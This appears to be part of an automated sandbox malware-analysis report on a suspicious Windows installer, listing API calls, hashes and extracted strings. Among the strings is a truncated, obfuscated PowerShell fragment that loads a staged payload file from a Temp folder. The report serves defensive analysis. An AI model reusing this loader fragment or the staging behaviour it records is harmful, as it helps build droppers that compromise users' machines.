                                                                • Instruction ID: bbf35a5bb38483cb45838bf81b7f1c8f5060ebeb43bc13b88216483053fd9792
                                                                • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                • Instruction Fuzzy Hash: 39C04C713156019ADB506F219F08B1B7A54AB60741F15843DA946E10E0DF348465ED2E
                                                                APIs
                                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 00406148
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                • Instruction ID: ca8ad94ba98101b04707ee716b1639a660357d6e221e98cfabfb3f37e80db725
                                                                • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                • Instruction Fuzzy Hash: E4E0E67201010DBEDF095F50DD0AD7B371DE704304F01492EFA17D5091E6B5A9305675
                                                                APIs
                                                                • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                                Similarity
                                                                • API ID: PathSearch
                                                                • String ID:
                                                                • API String ID: 2203818243-0
                                                                • Opcode ID: e786f414240c977d8527d6485e0b16ac48e4592c975100b70ba3c002947ce116
                                                                • Instruction ID: 264fbd039af9554c7d5279b05a8ebe462d94e5569cecf838bb527c95a897585a
                                                                • Opcode Fuzzy Hash: e786f414240c977d8527d6485e0b16ac48e4592c975100b70ba3c002947ce116
                                                                • Instruction Fuzzy Hash: FEE0DF72700100EBE710DFA4DE48EAB33A8DF40368B30823AF611B60D1E6B499419B3D
                                                                APIs
                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032DC,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E40
                                                                Similarity
                                                                • API ID: FileWrite
                                                                • String ID:
                                                                • API String ID: 3934441357-0
                                                                • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                • Instruction ID: 5c61021ef0a451a09cd551de8c9c857919e5c63ef2f102696365ec0a5e508dbb
                                                                • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                • Instruction Fuzzy Hash: A0E08C3220021AABCF10AF54DC00BEB3B6CFB007A0F004432F955E7080D230EA248BE8
                                                                APIs
                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040330E,00000000,00000000,00403165,?,00000004,00000000,00000000,00000000), ref: 00405E11
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                • Instruction ID: 9b1550485fdad5d6ef3d10e0c43d96089a261685836c6268fec650e6d6f6a4c0
                                                                • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                • Instruction Fuzzy Hash: D9E08C3220025AABCF109F50EC00EEB3BACEB04360F000433F960E6040D230E9219BE4
                                                                APIs
                                                                • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F
                                                                Similarity
                                                                • API ID: PrivateProfileString
                                                                • String ID:
                                                                • API String ID: 1096422788-0
                                                                • Opcode ID: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                                • Instruction ID: 3d6fae6e588f42459dd5c721a8c471f59e455a0f8de0d1d47597fcd0a09f6ae9
                                                                • Opcode Fuzzy Hash: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                                • Instruction Fuzzy Hash: 68E04830804208AADF106FA1CE499AE3A64AF00341F144439F9957B0D1E6F8C4816745
                                                                APIs
                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617F,?,00000000,?,?,: Completed,?), ref: 00406115
                                                                Similarity
                                                                • API ID: Open
                                                                • String ID:
                                                                • API String ID: 71445658-0
                                                                • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                • Instruction ID: 20b5f733041f2f32f375600c7003e80ff03328fe780dbad1ce8753698e77b2b9
                                                                • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                • Instruction Fuzzy Hash: 9BD0123204020DBBDF119E909D01FAB376DAB08310F014826FE06A8092D776D530AB54
                                                                APIs
                                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 5f2b9645a280aa2e5618dda491c9c816a8b757916b71e5b574aff38626a5ba8c
                                                                • Instruction ID: b9fbdb96d3617381fc4168e6aeef7157df6c2fc4641ee643fe61426fbe6ebd08
                                                                • Opcode Fuzzy Hash: 5f2b9645a280aa2e5618dda491c9c816a8b757916b71e5b574aff38626a5ba8c
                                                                • Instruction Fuzzy Hash: 69D01232B04100DBDB10DBA4AF4899E73A49B44369B304677E502F11D0D6B9D9515A29
                                                                APIs
                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                • Instruction ID: 7bbc1d354ca6a657268cc6ac0e987aef7d9b1e86ba1bc1dada8f70c4162f718e
                                                                • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                • Instruction Fuzzy Hash: B6C04C717402016AEA209B519E49F1677545BA0B40F1584797750E50E4C674D450D62C
                                                                APIs
                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 0040331F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: FilePointer
                                                                • String ID:
                                                                • API String ID: 973152223-0
                                                                • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                APIs
                                                                • SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                                                • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                                                APIs
                                                                • ShellExecuteExW.SHELL32(?), ref: 004058BF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: ExecuteShell
                                                                • String ID:
                                                                • API String ID: 587946157-0
                                                                • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                                • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                                • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                                • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                                APIs
                                                                • KiUserCallbackDispatcher.NTDLL(?,00403FF4), ref: 00404227
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: CallbackDispatcherUser
                                                                • String ID:
                                                                • API String ID: 2492992576-0
                                                                • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                                                • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08
                                                                APIs
                                                                  • Part of subcall function 004052EC: lstrlenW.KERNEL32(Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                  • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                  • Part of subcall function 004052EC: lstrcatW.KERNEL32(Completed,0040324F,0040324F,Completed,00000000,00410EA0,004030B0), ref: 00405347
                                                                  • Part of subcall function 004052EC: SetWindowTextW.USER32(Completed,Completed), ref: 00405359
                                                                  • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                  • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                  • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                  • Part of subcall function 0040586D: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                                  • Part of subcall function 0040586D: CloseHandle.KERNEL32(?), ref: 004058A3
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F4D
                                                                  • Part of subcall function 0040670F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406720
                                                                  • Part of subcall function 0040670F: GetExitCodeProcess.KERNEL32(?,?), ref: 00406742
                                                                  • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                • String ID:
                                                                • API String ID: 2972824698-0
                                                                • Opcode ID: 4bccf259bf579bfc981a9d644e2eeac5cb2ef6dcf81bcc0c58dbcf99a973db51
                                                                • Instruction ID: 3becab0f16e6f8309876834f620f7dc234fcc10e550b4e4e61bdbb7a81e04ee7
                                                                • Opcode Fuzzy Hash: 4bccf259bf579bfc981a9d644e2eeac5cb2ef6dcf81bcc0c58dbcf99a973db51
                                                                • Instruction Fuzzy Hash: 3EF09632905011DBCB20FBA1894459F76A49F00318B2445BBF902B21D1C77D0E519A6E
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404C80
                                                                • GetDlgItem.USER32(?,00000408), ref: 00404C8B
                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
                                                                • LoadBitmapW.USER32(0000006E), ref: 00404CE8
                                                                • SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
                                                                • DeleteObject.GDI32(00000000), ref: 00404D5E
                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404E99
                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
                                                                • ShowWindow.USER32(?,00000005), ref: 00404EB8
                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
                                                                • ImageList_Destroy.COMCTL32(?), ref: 00405088
                                                                • GlobalFree.KERNEL32(?), ref: 00405098
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E9
                                                                • ShowWindow.USER32(?,00000000), ref: 00405237
                                                                • GetDlgItem.USER32(?,000003FE), ref: 00405242
                                                                • ShowWindow.USER32(00000000), ref: 00405249
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                • String ID: $M$N
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003FB), ref: 0040473B
                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404765
                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404816
                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404821
                                                                • lstrcmpiW.KERNEL32(: Completed,004236E8,00000000,?,?), ref: 00404853
                                                                • lstrcatW.KERNEL32(?,: Completed), ref: 0040485F
                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871
                                                                  • Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1
                                                                  • Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                  • Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                  • Part of subcall function 00406518: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                  • Part of subcall function 00406518: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 00404934
                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F
                                                                  • Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                  • Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
                                                                  • Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                Strings
                                                                • "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.S, xrefs: 00404705
                                                                • 6B, xrefs: 004047E9
                                                                • C:\Users\user\AppData\Local\Temp\depersonaliseredes, xrefs: 0040483C
                                                                • : Completed, xrefs: 0040484D, 00404852, 0040485D
                                                                • A, xrefs: 0040480F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                • String ID: "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.S$: Completed$A$C:\Users\user\AppData\Local\Temp\depersonaliseredes$6B
                                                                APIs
                                                                • DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 004059BF
                                                                • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A07
                                                                • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A2A
                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A30
                                                                • FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405A40
                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
                                                                • FindClose.KERNEL32(00000000), ref: 00405AEF
                                                                Strings
                                                                • \*.*, xrefs: 00405A01
                                                                • "C:\Users\user\Desktop\TVPfW4WUdj.exe", xrefs: 00405996
                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004059A4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                • String ID: "C:\Users\user\Desktop\TVPfW4WUdj.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                APIs
                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404458
                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040446C
                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404489
                                                                • GetSysColor.USER32(?), ref: 0040449A
                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
                                                                • lstrlenW.KERNEL32(?), ref: 004044BB
                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404536
                                                                • SendMessageW.USER32(00000000), ref: 0040453D
                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404568
                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
                                                                • SetCursor.USER32(00000000), ref: 004045BC
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
                                                                • SetCursor.USER32(00000000), ref: 004045D8
                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404607
                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                • String ID: 1C@$: Completed$N
                                                                APIs
                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                • String ID: F
                                                                APIs
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
                                                                • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14
                                                                  • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                  • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
                                                                • wsprintfA.USER32 ref: 00405F4F
                                                                • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
                                                                • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
                                                                • GlobalFree.KERNEL32(00000000), ref: 00406038
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F
                                                                  • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                  • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                • String ID: %ls=%ls$[Rename]
                                                                APIs
                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Char$Next$Prev
                                                                • String ID: "C:\Users\user\Desktop\TVPfW4WUdj.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                • API String ID: 589700163-1487668618
                                                                APIs
                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040427F
                                                                • GetSysColor.USER32(00000000), ref: 004042BD
                                                                • SetTextColor.GDI32(?,00000000), ref: 004042C9
                                                                • SetBkMode.GDI32(?,?), ref: 004042D5
                                                                • GetSysColor.USER32(?), ref: 004042E8
                                                                • SetBkColor.GDI32(?,?), ref: 004042F8
                                                                • DeleteObject.GDI32(?), ref: 00404312
                                                                • CreateBrushIndirect.GDI32(?), ref: 0040431C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                • String ID:
                                                                • API String ID: 2320649405-0
                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                  • Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E71
                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                • String ID: 9
                                                                • API String ID: 163830602-2366072709
                                                                APIs
                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
                                                                • GetMessagePos.USER32 ref: 00404BD9
                                                                • ScreenToClient.USER32(?,?), ref: 00404BF3
                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: Message$Send$ClientScreen
                                                                • String ID: f
                                                                • API String ID: 41195575-1993550816
                                                                APIs
                                                                • GetDC.USER32(?), ref: 00401DBC
